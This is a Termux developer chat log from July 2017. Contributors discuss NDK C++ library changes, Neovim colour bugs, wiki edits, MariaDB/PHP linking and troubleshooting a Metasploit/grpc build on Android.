2017-07-07 14:49:34 rods-tab3 .
2017-07-08 10:46:24 gitter (vishalbiswas) @Auxilus looking into it right now
2017-07-08 13:06:12 gitter (vishalbiswas) what’s the fix for no member named ‘to_string’ in namespace ‘std’
2017-07-08 16:07:49 gitter (fornwall) @vishalbiswas about to_string, it’s missing due to bugs in the old c++ library (libgnustl), https://github.com/android-ndk/ndk/issues/82
2017-07-08 16:09:43 gitter (fornwall) that is supposed to be fixed by the transition to libc++ in the ndk, which was supposed to take place first in r12, then r13, then r14, then r15, and now in r16 according to the ndk roadmap :)
2017-07-08 16:10:06 gitter (fornwall) the good news is that now it’s actually probably going to happen
2017-07-08 23:16:00 gitter (vishalbiswas) @fornwall can you modify libprotobuf to not host build and instead install protobuf on build machine and use that?
2017-07-09 06:49:22 gitter (noncom) is it possible to use Docker images under Termux?
2017-07-09 06:49:47 gitter (noncom) I am new to Docker, but am imagining that that could be a neat way to organize things
2017-07-09 08:10:39 gitter (vishalbiswas) No docker yet
2017-07-09 08:29:58 live_the_dream need specific kernel drivers like overlay file system
2017-07-09 09:00:02 gitter (vishalbiswas) I want to extend Termux:API. Want to add another api. Where do I make change?
2017-07-09 10:49:22 rods-tab3 iirc afaik they are just shell scripts; so learn shell or write your own shell
2017-07-09 10:50:40 gitter (vishalbiswas) rods-tab3: only the bridge package is shell scripts, the real Termux:API is java. I want to know what rules should I follow for adding a new api
2017-07-09 11:54:50 gitter (noncom) GUYS, everyone is welcome to contribute to Termux wiki!!! https://wiki.termux.com/wiki/Main_Page
2017-07-09 11:55:03 gitter (noncom) if you have acheived something interesting with Termux
2017-07-09 11:55:10 gitter (noncom) or made some piece of software work
2017-07-09 11:55:17 gitter (noncom) let others know!
2017-07-09 11:55:47 gitter (noncom) it would help making Termux more popular more quickly!
2017-07-09 11:56:18 gitter (noncom) would possibly give you some feedback
2017-07-09 11:56:38 gitter (noncom) and help you to keep a good shape!
2017-07-09 11:58:01 gitter (noncom) start writing an article today, have something to build upon tomorrow
2017-07-09 14:10:40 gitter (fornwall) @vishalbiswas is there a problem with the host build of protobuf?
2017-07-09 14:12:09 gitter (fornwall) @vishalbiswas about termux:api, the app exposing the functionality to android intents is at https://github.com/termux/termux-api
2017-07-09 14:12:50 gitter (fornwall) then the shell scripts in https://github.com/termux/termux-api-package wraps the java exposed functionality in a command line script
2017-07-09 14:13:15 gitter (fornwall) @Neo-Oli great job with the wiki!
2017-07-09 16:31:07 frumpylava @fornwall thanks. all praise goes to the contributors though.
2017-07-09 19:24:20 italo Hello
2017-07-10 00:03:22 gitter (vishalbiswas) @fornwall no, nothing wrong with hostbuild. I’m porting grpc for metasploit, which also requires protoc. I’m using the host built one from libprotobuf right now.
2017-07-10 00:26:56 gitter (mklein994) I don’t know if it’s a Neovim thing or a Termux thing, but true colors isn’t working anymore.
2017-07-10 01:26:43 gitter (vishalbiswas) @mklein994 neovim was updated yesterday
2017-07-10 01:55:13 gitter (mklein994) That’s what I mean. I’m running version 0.2.1~20170709
(from apt show neovim
).
2017-07-10 02:10:35 rods-tab3 today is still 20170709 – for another 50 minutes
2017-07-10 02:55:59 frumpylava rods-tab3: Welcome to time zones.
2017-07-10 03:00:01 rods-tab3 ha ha yea - can be confusing at times eg android has some files dated Dec 31 1969 at 16:00 – when we all know the world/epoch begain at 00:00 Jan 1 1970
2017-07-10 03:01:12 rods-tab3 now its 20170710
2017-07-10 03:01:49 frumpylava It’s not tomorrow until it is on Baker Island.
2017-07-10 03:02:20 frumpylava So it’s still 20170710 for another 3 hours.
2017-07-10 03:02:28 frumpylava *20170709
2017-07-10 03:26:49 gitter (fornwall) @mklein994 neovim true color problem, is that only under tmux or also when run directly? I saw that there has already been a fix for running under tmux in neovim after the last update
2017-07-10 03:29:17 frumpylava @fornwall, @mklein994: I had problems with :set guicursor after the update. But only in tmux. I had to switch from “TERM=screen-256color” to “TERM=tmux-256color”
2017-07-10 03:35:17 frumpylava If anybody is near Switzerland in 2 weeks. On the 22.07.2017 14:00 I will be conducting a Workshop about Termux at this years ZeTeCo (which is a 4 day hacker camp in Schaffhausen, Switzerland)
2017-07-10 03:35:22 gitter (noncom) I apologise if I am asking something obvious, but what is the state of JDK under Termux?
2017-07-10 03:36:04 gitter (noncom) is it possible to get a Java dev going in Termux?
2017-07-10 06:34:03 gitter (Auxilus) @vishalbiswas I don’t recall that I had error with grpc when you instructed me 5 months ago
2017-07-10 06:56:34 gitter (Auxilus) I’m still having same errors after following timwr’s instructions on the issue
2017-07-10 07:49:43 gitter (mklein994) @fornwall both. Steps to reproduce: $ vim -u NORC --cmd 'set tgc'
:
2017-07-10 07:49:43 gitter (mklein994) ```vim
2017-07-10 07:49:43 gitter (mklein994) :source $VIMRUNTIME/syntax/colortest.vim
2017-07-10 07:49:43 gitter (mklein994) ```
2017-07-10 07:58:51 gitter (mklein994) @noncom I remember @vishalbiswas was working on openjdk 9; I’m not sure where things are at there.
2017-07-10 08:04:08 gitter (mklein994) There’s openjdk-9-jre-headless
in disabled packages…
2017-07-10 08:07:39 frumpylava I’m really liking how the termux wiki is comming along. Thanks to all those who contribute.
2017-07-10 08:09:17 live_the_dream im sorry that even though english is my first language that i still suck at it
2017-07-10 08:29:13 gitter (Auxilus) @vishalbiswas is libgrpc available in termux ?
2017-07-10 10:25:50 frumpylava Is there a way yet to enable and disable the camera led?
2017-07-10 11:08:35 BrainDamage random idea, instead of 5000 tools to do the translation to the phone api, wouldn’t it be better to expose them as a filesystem like the rest of linux kernel?
2017-07-10 11:09:02 BrainDamage even without using fuse, you could watch for file read/write and simply read the data
2017-07-10 11:37:24 gitter (vishalbiswas) @Auxilus I have a pull request for it, but, the gem is still not installable yet. I’m working on it.
2017-07-10 11:38:37 gitter (vishalbiswas) @noncom Java 9 is available but not very stable. AArch64 is not available altogether. AArch64 users will need to use ARM
2017-07-10 12:02:40 gitter (mklein994) @noncom is there a prebuilt package for ARM available to try?
2017-07-10 12:15:14 vitruzicka66 Hello
2017-07-10 12:17:48 vitruzicka66 Your app is great, thanks
2017-07-10 12:17:48 timwr <3
2017-07-10 12:25:06 rods-tab3 [09:10] (rods-tab3) will you review my code ? https://m.xkcd.com/1833/
2017-07-10 12:32:55 timwr I have a question, how would someone (me?) package a source code project (metasploit) so that pkg install metasploit-framework would work?
2017-07-10 12:33:27 timwr the following commands: https://github.com/timwr/metasploit-framework/blob/termux/termux get it working
2017-07-10 12:33:40 timwr but I’d like people to simply be able to run pkg install metasploit (rather than that script)
2017-07-10 13:04:29 gitter (vishalbiswas) timwr: metasploit is a headache for packaging. best of luck
2017-07-10 13:05:19 gitter (vishalbiswas) @mklein994 are you asking me?
2017-07-10 13:51:15 gitter (mklein994) Sure, if you have a Java package. Does it work on ARM?
2017-07-10 15:53:23 jellybeam after updating to latest neovim package it seems that colorschemes are not working anymore, has anyone noticed the same behaviour?
2017-07-10 20:34:17 gitter (mklein994) jellybeam: yeah. It’s actually really annoying.
2017-07-10 21:01:43 gitter (vishalbiswas) @mklein994 https://drive.google.com/folderview?id=0B8Q4yBRb9PSHQ2lfVVYzLU5JelE only arm package is up-to-date
2017-07-10 22:42:47 gitter (vishalbiswas) live_the_dream: did you add your repo’s info in the wiki? I want to add Rust instructions
2017-07-10 22:44:29 live_the_dream change ehat ever
2017-07-10 22:46:22 gitter (vishalbiswas) live_the_dream: where’s it? cannot find it
2017-07-10 22:47:27 live_the_dream under scipy
2017-07-10 22:51:39 live_the_dream oh yeah about libgrpc … from the looks of it we probably should have a termux_setup_protobuf
2017-07-10 22:52:15 gitter (vishalbiswas) live_the_dream: or just add protobuf to setup-ubuntu.sh
2017-07-10 22:52:47 gitter (vishalbiswas) live_the_dream: you are a ‘he’, right?
2017-07-10 22:53:32 live_the_dream yeah
2017-07-10 22:53:32 live_the_dream last time i checked
2017-07-10 22:58:32 gitter (vishalbiswas) live_the_dream: what are the most important packages in your repo?
2017-07-10 22:58:46 gitter (vishalbiswas) adding more info in package management section
2017-07-10 22:59:39 live_the_dream people would be most intersted in scipy gcc-7 (there was a bug fix for arm) and R
2017-07-10 23:00:39 live_the_dream but i don’t have any data on what is used
2017-07-10 23:01:54 gitter (vishalbiswas) live_the_dream: package name of R is r-cran
?
2017-07-10 23:02:01 live_the_dream yeah
2017-07-10 23:04:12 gitter (vishalbiswas) live_the_dream: add instructions https://wiki.termux.com/wiki/Package_Management
2017-07-10 23:10:14 gitter (vishalbiswas) also simplified https://wiki.termux.com/wiki/Installing_Scipy_The_Easy_Way
2017-07-11 04:22:34 frumpylava @fornwall we’re having Hash sum mustaches again.
2017-07-11 04:39:31 gitter (Auxilus) @vishalbiswas I don’t have libgrpc installed , also looks like it’s not in repo , so how can I follow :- https://wiki.termux.com/wiki/Metasploit#grpc ?
2017-07-11 05:13:14 gitter (Auxilus) @vishalbiswas can u share libgrpc .deb file ?
2017-07-11 05:45:33 BrainDamage please don’t suggest curlpipesh as a method for installation
2017-07-11 05:46:00 fornwall frumpylava: fixed now?
2017-07-11 05:46:28 frumpylava fornwall: According to the guy on github, yes.
2017-07-11 05:47:51 BrainDamage you can even detect the usage of that, and use it to toggle delivery of malicious scripts: https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
2017-07-11 05:48:50 BrainDamage but it’s just bad practice to run random shell code without reviewing
2017-07-11 05:49:50 BrainDamage also, semi-related, are termux packages signed?
2017-07-11 05:50:13 BrainDamage ( I’m not familiar enough with apt to check )
2017-07-11 05:59:39 fornwall BrainDamage: the termux.net apt repository (which contains the sha-256 checksum of the .deb files) is signed, which apt uses when installing packages
2017-07-11 06:00:07 BrainDamage k, thanks
2017-07-11 06:00:40 fornwall but the .deb files themselves are not directly signed (I haven’t looked into it yet, and as long as packages are installed with apt it’s not critical to sign the .deb files)
2017-07-11 06:01:24 BrainDamage gpg signatures themselves are a signature on a hash
2017-07-11 06:02:03 BrainDamage so this turns as a signature on a hash of a hash
2017-07-11 06:06:36 BrainDamage live_the_dream: since you’re packaging sc, you might want to add https://github.com/andmarti1424/sc-im which has added several nice features
2017-07-11 06:09:30 BrainDamage the plotting fuctions are quite nice, esp if you have a sixel capable terminal, then you actually have proper pics
2017-07-11 06:31:27 gitter (fornwall) about neovim true colors, it seems to be a problem with neovim git master, https://github.com/neovim/neovim/issues/7003. hopefully it’s fixed later today so we can just push an updatety
2017-07-11 06:31:49 gitter (fornwall) perhaps we should switch away from following neovim HEAD, and instead package the latest tagged release?
2017-07-11 06:35:06 live_the_dream sixel … if only
2017-07-11 06:54:13 BrainDamage well, at least from ssh, it works
2017-07-11 06:54:27 BrainDamage plus there’s also the ascii plots
2017-07-11 06:54:39 BrainDamage https://github.com/andmarti1424/sc-im/raw/freeze/screenshots/scimp3.png?raw=true
2017-07-11 07:02:35 live_the_dream hmm
2017-07-11 07:02:35 live_the_dream wordexp.h
2017-07-11 07:02:35 live_the_dream sc-im relies on glibc
2017-07-11 07:02:38 live_the_dream where as sc does not
2017-07-11 07:09:39 frumpylava @fornwall I agree with switching Neovim to releases. I think we should do that starting with the next release.
2017-07-11 07:35:48 frumpylava Then we can switch to neovim v0.2.1 when it gets released.
2017-07-11 07:56:26 Auxilus is libgrpc on repo yet ? ( I saw merged status of PR )
2017-07-11 08:45:15 Jookia_ Hello! Is there a way to run a Termux command in the background at boot (maybe from root?)
2017-07-11 09:19:52 Jookia_ Nevermind, worked it out - ‘am startservice -n com.termux/com.termux.app.TermuxService -a com.termux.service_execute -d ‘/data/data/com.termux/files/home/.shortcuts/tasks/one’ –ez com.termux.execute.background True’
2017-07-11 10:41:03 gitter (noncom) @mklein994 I don’t know… that’s what I am wandering
2017-07-11 10:41:12 gitter (noncom) want to be able to code java in Termux
2017-07-11 19:47:00 gitter (mklein994) About Neovim truecolors colors not working: I just built the latest neovim-git on Arch Linux, ssh
ed into it from Termux, and same problem. It works in tmux though. I like the idea of following releases; having an editor break like this is kind of annoying, especially if you use it to fix bugs in other programs.
2017-07-11 20:53:26 live_the_dream mklein994 so its a terminfo issue?
2017-07-11 22:58:27 gitter (vishalbiswas) frumpylava: is there a way to enable uploads of .patch
files? A user is having trouble while creating the patch in metasploit instructions.
2017-07-11 23:47:00 gitter (Auxilus) @vishalbiswas I’m having error while using extconf.patch to build grpc
2017-07-11 23:53:46 Auxils @vishalbiswas , it says it can’t open file /data/data/com.termux/files/home/extconf.rb
2017-07-12 00:01:02 gitter (vishalbiswas) @Auxilus fixed, try again
2017-07-12 00:04:13 Auxils okay thanx
2017-07-12 00:09:27 Auxils @vishalbiswas , worked
2017-07-12 00:11:56 Auxils @vishalbiswas is there any possibility of implementing wine32 (not win32) package ?
2017-07-12 00:12:16 Auxils @vishalbiswas
2017-07-12 00:12:30 Auxils grpc is not installing
2017-07-12 00:12:37 Auxils still the same errors
2017-07-12 00:12:54 Auxils it says it cant find nameser.h
2017-07-12 00:13:38 gitter (vishalbiswas) @Auxilus you need to install the locally compiled gem
2017-07-12 00:13:45 gitter (vishalbiswas) not gem install grpc
2017-07-12 00:14:31 Auxils aye , thats what ive done , i did gem install grpc-1.4.1.gem
2017-07-12 00:15:08 gitter (vishalbiswas) libgrpc is installed? did you apply the patch correctly?
2017-07-12 00:15:31 Auxils yes i did all that , i even installed libgrpc-dev
2017-07-12 00:15:53 Auxils should I pastebin .out ?
2017-07-12 00:17:02 gitter (vishalbiswas) instead redo the grpc step and show me an asciinema
2017-07-12 00:17:15 Auxils of ?
2017-07-12 00:17:25 gitter (vishalbiswas) you doing it
2017-07-12 00:17:26 Auxils just gem installation or patching too ?
2017-07-12 00:17:33 gitter (vishalbiswas) patching too
2017-07-12 00:17:47 Auxils okay , 1 sec …
2017-07-12 00:24:07 Auxils @vishalbiswas , its installed , apparently there was some problem with the patch i did :p
2017-07-12 00:25:43 Auxils @vishalbiswas , Do I have to run it under termux-chroot ?
2017-07-12 00:26:08 gitter (vishalbiswas) @Auxilus no just follow the fix shebangs section
2017-07-12 00:26:28 Auxils aye , i couldn’t run msfconsole
2017-07-12 00:27:24 Auxils when i try to run the shebang command , it says can’t recognise -executable
2017-07-12 00:27:51 gitter (vishalbiswas) did you install findutils?
2017-07-12 00:27:56 gitter (vishalbiswas) its in prequisities
2017-07-12 00:28:12 Auxils wait ill see
2017-07-12 00:28:58 Auxils nope still the erro
2017-07-12 00:29:29 Auxils find: unrecognized: -executable
2017-07-12 00:29:43 gitter (vishalbiswas) apt install findutils
2017-07-12 00:29:51 Auxils I did that
2017-07-12 00:30:15 Auxils findutils is installed
2017-07-12 00:31:11 gitter (vishalbiswas) @Auxilus ls -l \
which find``
2017-07-12 00:31:21 gitter (vishalbiswas) ignore that
2017-07-12 00:31:38 gitter (vishalbiswas) ```
2017-07-12 00:31:59 gitter (vishalbiswas) @Auxilus do ls -l which find
2017-07-12 00:31:59 gitter (vishalbiswas)
2017-07-12 00:32:13 Auxils k
2017-07-12 00:33:43 Auxils .
2017-07-12 00:34:04 Auxils looks like find is in /bin/applets/
2017-07-12 00:34:18 Auxils also there is some’ like -> ./busybox
2017-07-12 00:35:36 gitter (vishalbiswas) if you installed findutils, that shouldn’t be the output
2017-07-12 00:36:05 gitter (vishalbiswas) its using the busybox one. can u reinstall findutils
2017-07-12 00:36:12 Auxils okay
2017-07-12 00:36:54 Auxils still same op
2017-07-12 00:37:11 gitter (Auxilus) localhost : ls -l which find
2017-07-12 00:37:11 gitter (Auxilus) lrwxrwxrwx 1 u0_a96 u0_a96 10 Jun 28 16:57 /data/data/com.termux/files/usr/bin/applets/find -> ../busybox
2017-07-12 00:37:57 Auxils I did apt remove findutils
then apt install
again
2017-07-12 00:38:52 gitter (vishalbiswas) okay then use $PREFIX/bin/find instead
2017-07-12 00:41:05 Auxilus @vishalbiswas
2017-07-12 00:41:10 Auxilus ?
2017-07-12 00:41:25 gitter (vishalbiswas) check the wiki, modified it
2017-07-12 00:41:37 Auxilus k
2017-07-12 00:43:10 Auxilus .
2017-07-12 00:44:12 Auxilus what about wine32 package? can we have them in termux ?
2017-07-12 00:47:43 Auxilus @vishalbiswas , msfconsole is not booting up its stuck at ./msfconsole
2017-07-12 01:08:32 Auxilus @vishalbiswas I got wall of errors here
2017-07-12 01:21:55 gitter (vishalbiswas) @Auxilus ?
2017-07-12 01:22:00 gitter (vishalbiswas) errors?
2017-07-12 01:24:58 gitter (Auxilus) Aye , wall of errors
2017-07-12 01:25:54 gitter (Auxilus) Wait
2017-07-12 01:26:52 gitter (Auxilus) https://pastebin.com/z0KFfQH0
2017-07-12 01:26:52 gitter (Auxilus) Here
2017-07-12 01:26:56 gitter (Auxilus) Take a look
2017-07-12 01:27:35 gitter (vishalbiswas) redo network_interface
2017-07-12 01:27:43 gitter (vishalbiswas) it was changed earlier
2017-07-12 01:29:28 gitter (Auxilus) Kay
2017-07-12 01:29:39 gitter (Auxilus) Remove old gem first ?
2017-07-12 01:30:06 gitter (vishalbiswas) yes
2017-07-12 01:32:54 gitter (Auxilus) patching file ext/network_interface_ext/netifaces.c
2017-07-12 01:32:54 gitter (Auxilus) localhost : gem build network_interface.gemspec
2017-07-12 01:32:54 gitter (Auxilus) WARNING: ./netifaces.patch is not world-readable
2017-07-12 01:32:54 gitter (Auxilus) [full message: https://gitter.im/termux/termux?at=5965b486bc46472974ded9e6]
2017-07-12 01:32:58 gitter (Auxilus) Ignore ?
2017-07-12 01:33:48 live_the_dream oh BrainDamage sc-im is up tell me how broken it is?
2017-07-12 01:36:09 gitter (Auxilus) @vishalbiswas thanks , metasploit is working now , I’ll test the database usage
2017-07-12 01:39:44 gitter (Auxilus) @vishalbiswas why don’t we have msfdb in metasploit?
2017-07-12 05:47:42 frumpylava hmm… ever since I updated to android 7.1.1 mpv’s audio output is really stuttery.
2017-07-12 07:57:34 BrainDamage live_the_dream: after some light usage, it seems to work
2017-07-12 08:22:29 live_the_dreams did the standard thing … got the musl libc stuff
2017-07-12 10:19:23 live_the_dreams nb2b
2017-07-12 11:40:22 gitter (vishalbiswas) is samba possible in termux?
2017-07-12 12:50:41 vitruzicka66 smbclient doesn’t work?
2017-07-12 18:54:50 live_the_dream samba requires root if recall vish
2017-07-12 22:39:00 gitter (vishalbiswas) live_the_dream: I have root access, though. Really tired of using scp
2017-07-13 01:28:16 tomty89 is the “system” in termux english only?
2017-07-13 01:29:14 tomty89 coz it seems to me that setting LANG to anything else doesn’t make difference
2017-07-13 01:29:35 gitter (vishalbiswas) tomty89: yes
2017-07-13 01:30:31 tomty89 ahh okay thanks @vishalbiswas
2017-07-13 02:28:25 frumpylava Sigh… I should just go back to Android 5 and stay there forever.
2017-07-13 02:29:25 live_the_dreams why?
2017-07-13 02:29:33 live_the_dreams was android was being mean?
2017-07-13 02:30:21 frumpylava yeah. Every time I update my phone I have to create and issue starting with “I recenlty updated my Android…”. And every time it’s becoming more and more obscure shit that’s basically impossible to debug.
2017-07-13 02:33:59 frumpylava Like the random restarts with weechat and now stuttering with mpv over bluetooth.
2017-07-13 02:48:29 frumpylava live_the_dream_s: but it works with mpd, so I am now trying to convert my music setup to that. I’ll somehow have to implement https://github.com/Neo-Oli/Termux-Mpv with mpd as well.
2017-07-13 02:49:38 live_the_dream_s odd
2017-07-13 02:50:39 live_the_dream_s you can just use a mpd client
2017-07-13 02:50:39 live_the_dream_s as the player
2017-07-13 02:50:39 live_the_dream_s lots of those in playstore
2017-07-13 02:53:08 frumpylava live_the_dream_s: If at all possible I want to avoid that.
2017-07-13 02:54:32 frumpylava Someday I am just going to build my own phone with a raspberry pi zero
2017-07-13 02:55:00 live_the_dream_s thats all i ever wanted
2017-07-13 18:29:01 fornwall I’ve just pushed a transition from libgnustl (the gnu c++ library that’s being dropped from the NDK and is somewhat broken and outdated) to libc++
2017-07-13 18:29:23 fornwall this will make things as std::to_string and other c++ features work
2017-07-13 18:31:21 fornwall as it’s a bad idea to mix gnustl and libc++ in a running program as they use different binary interfaces, people building packages should run ./clean.sh to get fresh builds
2017-07-13 18:32:46 fornwall and until the transition is pushed to the package repository (hopefully within a day or two), and every c++ using program and library is rebuilt against libc++, it won’t work to install c++-using packages built now
2017-07-13 18:35:31 fornwall and after the transition goes live, c++-using programs and libraries built on the device that links against c++ libs in termux packages probably needs to be rebuilt, so that the c++ standard library in the built binaries match the one in termux packages
2017-07-13 20:20:54 live_the_dreams need to update everything because libc++ …
2017-07-13 21:05:38 gitter (chadmpaul) Jehan: I’m looking for help on that as well. EACCESS anywhere I try to install an npm package
2017-07-13 23:05:18 gitter (vishalbiswas) fornwall: thanks for this!
2017-07-13 23:15:45 live_the_dreams docker file needs updating ?
2017-07-13 23:30:12 live_the_dreams also fix the mpd build since it produces a script that preloads libgnustl_shared
2017-07-14 00:12:36 rods-tab3 do we have octave ? https://www.gnu.org/software/octave/doc/interpreter/index.html#SEC_Contents
2017-07-14 00:19:43 gitter (vishalbiswas) rods-tab3: from its-pointless’ repo
2017-07-14 00:23:00 rods-tab3 thnx
2017-07-14 00:26:23 gitter (vishalbiswas) anybody have ubuntu zesty or the docker image? what version of llvm does apt install llvm install?
2017-07-14 00:34:51 frumpylava @vishalbiswas 1:4.0-34ubuntu2
2017-07-14 00:35:03 gitter (vishalbiswas) frumpylava: thanks
2017-07-14 00:35:26 gitter (vishalbiswas) did you try php-mysql again
2017-07-14 00:57:43 gitter (vishalbiswas) fornwall: /home/vishal/.termux-build/_lib/15.1-arm-21-v9/include/c++/4.9.x/cstddef:43:25: fatal error: stddef.h: No such file or directory
2017-07-14 01:11:11 frumpylava @vishalbiswas Yeah, the current build of mariadb is incompatible because it doesn’t have libmysqlclient
2017-07-14 01:11:31 gitter (vishalbiswas) frumpylava: did you read my reply on that pull request?
2017-07-14 01:14:07 frumpylava yeah, bit I don’t understand it yet. I will have to look into it. Or can you explain what I’d need to do?
2017-07-14 01:14:40 gitter (vishalbiswas) frumpylava: build mariadb yourself, then build php. done
2017-07-14 01:15:00 gitter (vishalbiswas) libmysqlclient is built as a static lib now
2017-07-14 01:15:13 frumpylava but i am building mariadb myself.
2017-07-14 01:15:56 gitter (vishalbiswas) frumpylava: do you have /data/data/com.termux/files/usr/lib/libmysqlclient.a
2017-07-14 01:16:47 gitter (vishalbiswas) don’t link php-mysql against libmariadb, instead use libmysqlclient
2017-07-14 02:15:40 rods-tab3 i don’t see octive here https://github.com/its-pointless/termux-packages/tree/master/packages … am i looking in the wrong place ?
2017-07-14 02:16:26 frumpylava @vishalbiswas I don’t have libmysqlclient.a after building mariadb.
2017-07-14 02:50:52 frumpylava What’s the status of ghostscript?
2017-07-14 03:51:29 gitter (fornwall) @vishalbiswas when do you get the stddef.h
error?
2017-07-14 05:45:47 gitter (oguz-ismail) how can I compile android shared objects from termux with clang ?
2017-07-14 07:44:20 joshd How does one use syscmd/esyscmd in m4? It seems not to work, perhaps because of the weird path to the shell?
2017-07-14 07:55:23 live_the_dreams @vishalbiswas rustc looks for gnustl and fails …
2017-07-14 08:03:25 live_the_dreams specifically the headers
2017-07-14 09:30:10 live_the_dreams probably docker image issue
2017-07-14 11:34:07 gitter (vishalbiswas) @fornwall rustc build
2017-07-14 11:35:25 gitter (vishalbiswas) frumpylava: ls -l /data/data/com.termux/files/usr/lib/libmysqlclient.a on build machine doesn’t show?
2017-07-14 11:39:00 gitter (vishalbiswas) rods-tab3: add its-pointless’ repo https://wiki.termux.com/wiki/Package_Management. Then apt install octave
2017-07-14 11:39:28 gitter (vishalbiswas) @oguz-ismail exactly like any other linux based system using clang compiler
2017-07-14 11:42:35 gitter (vishalbiswas) live_the_dreams: building or running?
2017-07-14 11:46:22 gitter (vishalbiswas) frumpylava: I can force shared lib for libmysqlclient if you want but libmariadb is exactly that
2017-07-14 11:49:27 frumpylava @vishalbiswas no. libmysqlclient.a is not a thing after building mariadb.
2017-07-14 11:50:49 gitter (vishalbiswas) frumpylava: ```patch
2017-07-14 11:50:49 gitter (vishalbiswas) — ./libmariadb/libmariadb/CMakeLists.txt 2017-05-15 04:43:15.000000000 +0530
2017-07-14 11:50:49 gitter (vishalbiswas) +++ ./libmariadb/libmariadb/CMakeLists.txt 2017-07-13 08:56:44.760099527 +0530
2017-07-14 11:50:49 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=5968e8523230e14f3a5b87fa]
2017-07-14 11:50:52 gitter (vishalbiswas) ```patch
2017-07-14 11:50:53 gitter (vishalbiswas) — ./libmariadb/libmariadb/CMakeLists.txt 2017-05-15 04:43:15.000000000 +0530
2017-07-14 11:50:53 gitter (vishalbiswas) +++ ./libmariadb/libmariadb/CMakeLists.txt 2017-07-13 08:56:44.760099527 +0530
2017-07-14 11:50:53 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=5968e85b329651f46e891cf6]
2017-07-14 11:51:49 gitter (vishalbiswas) as you can see in that file, libmariadb is virtually identical to libmysqlclient. I don’t understand where the problem comes from
2017-07-14 11:51:49 gitter (vishalbiswas)
2017-07-14 11:53:04 frumpylava It’s because I have to patch php in a dozen places to accept the new library name.
2017-07-14 12:03:33 gitter (vishalbiswas) frumpylava: https://gist.github.com/vishalbiswas/b2b64cf10ece9bb8415f91fc9f77c67e
2017-07-14 12:04:08 gitter (vishalbiswas) or we can ln -s $PREFIX/libmariadb.so $PREFIX/libmysqlclient.so
2017-07-14 12:06:25 frumpylava @vishalbiswas Alright I’ll give that a try.
2017-07-14 12:45:42 gitter (vishalbiswas) @fornwall we don’t need termux_setup_cmake anymore do we? installing cmake through setup-ubuntu.sh will be enough
2017-07-14 12:49:24 frumpylava @vishalbiswas Your patch is reversed. Can you send it to me the other way around?
2017-07-14 13:03:40 gitter (vishalbiswas) frumpylava: sorry https://gist.github.com/vishalbiswas/b2b64cf10ece9bb8415f91fc9f77c67e
2017-07-14 13:04:41 gitter (vishalbiswas) mongodb requires wiredtiger requires 64-bit ;(
2017-07-14 13:48:59 gitter (vishalbiswas) @fornwall can we switch to gold?
2017-07-14 15:33:03 Grimler frumpylava: last time i tried building ghostscript if finished but seemed to have pulled in the system libjpeg(/libpng?) instead of termux’s version, when I debugged it on device it indicated something like that if my memory serves me correctly.. Compiling ghostscript involves building some stuff that the host should be able to execute, I think the relevant flags needs to be set correctly. The docs have
2017-07-14 15:33:08 Grimler some good information related to cross compiling: https://ghostscript.com/doc/9.21/Make.htm#Cross-compiling
2017-07-14 17:15:33 gitter (fornwall) @vishalbiswas the gold linker? I guess so, it’s already used for aarch64 (https://github.com/termux/termux-packages/blob/master/build-package.sh#L557), so can probably be enabled for all arches
2017-07-14 17:38:43 gitter (fornwall) @vishalbiswas could you try enabling gold for all arches, try out some builds and submit a pr?
2017-07-14 17:40:13 gitter (fornwall) @vishalbiswas about termux_setup_cmake, I think we can keep it to be able to update cmake regardless of ubuntu package versions (as part of transitioning to libc++ cmake used during build was updated to 3.9.0-rc6, as the 3.9 series contains related android fixes)
2017-07-14 18:37:49 live_the_dreams the docker rmoves stuff from ndk that is requierd
2017-07-14 18:39:07 live_the_dreams also including cstddef fails
2017-07-14 18:44:56 live_the_dreams g++ anyway
2017-07-14 18:46:58 live_the_dreams https://github.com/android-ndk/ndk/issues/215
2017-07-14 20:00:34 fornwall what part of the ndk? platforms other than 21?
2017-07-14 20:09:38 fornwall ah, sorry, found it, sources/cxx-stl/llvm-libc++*
2017-07-14 20:10:01 fornwall I must have run setup-android-sdk.sh inside my docker container and forgotten about it
2017-07-14 20:38:00 fornwall an updated docker image has been pushed, thanks!
2017-07-14 22:05:33 live_the_dreams also patched cstddef is needed for using g++
2017-07-14 22:07:14 live_the_dreams #ifndef CLANG ; #include ../../fgg whatever
2017-07-14 22:07:25 live_the_dreams and reverse patch for building ndk-stl?
2017-07-14 22:14:21 live_the_dreams also ndk-patches dir doesn’t patch c++ includes…
2017-07-14 22:18:25 live_the_dreams fixed cstddef fixes the issu4 i had with rustc vish
2017-07-14 22:18:31 live_the_dreams also means i can compile gcc-7 again
2017-07-14 22:34:33 rods-tab3 https://wiki.termux.com/wiki/Main_Page
2017-07-14 22:35:57 live_the_dreams ?
2017-07-14 23:23:33 gitter (vishalbiswas) live_the_dream: many thanks for the fix. But I don’t understand why is g++ invoked as I pass –enable-clang. This include error is a known bug in ndk gcc/g++
2017-07-14 23:25:32 live_the_dreams no idea
2017-07-14 23:26:32 live_the_dreams i now know its a knoen bug
2017-07-14 23:27:41 live_the_dreams i even linked url..
2017-07-14 23:38:45 live_the_dreams could be an android target thing
2017-07-14 23:41:54 gitter (vishalbiswas) Anyways, libc++ means jdk will compile on AArch64. Now I can shared link with -lc++ which should lower its size and who knows, maybe fix some crashes
2017-07-15 00:04:38 gitter (vishalbiswas) @fornwall why is -Wl,--fix-cortex-a8
added to LDFLAGS. Specifically why is it passed as a -Wl
option?
2017-07-15 00:25:51 gitter (vishalbiswas) CLANG
2017-07-15 00:25:52 gitter (vishalbiswas) CLANG
2017-07-15 00:27:02 gitter (vishalbiswas) live_the_dreams: what do you mean by reverse patch for building ndk-stl?
2017-07-15 00:28:33 live_the_dreams so when c++ headers are added
2017-07-15 00:28:33 live_the_dreams its not patched
2017-07-15 00:28:33 live_the_dreams on device
2017-07-15 00:29:47 gitter (vishalbiswas) live_the_dreams: what does it hurt?
2017-07-15 00:30:36 live_the_dreams depends
2017-07-15 00:30:36 live_the_dreams on what the patch looks like
2017-07-15 00:30:36 live_the_dreams but idk don’t care
2017-07-15 00:36:47 gitter (vishalbiswas) great, If I enable clang in jdk build, host cc also needs to be clang
2017-07-15 00:39:42 gitter (vishalbiswas) * buildcc
2017-07-15 00:44:20 gitter (vishalbiswas) live_the_dreams: shouldn’t that patch be #ifdef CLANG?
2017-07-15 00:44:57 live_the_dreams yeah
2017-07-15 00:45:10 live_the_dreams whatever
2017-07-15 00:45:50 live_the_dreams clang needs it as it is
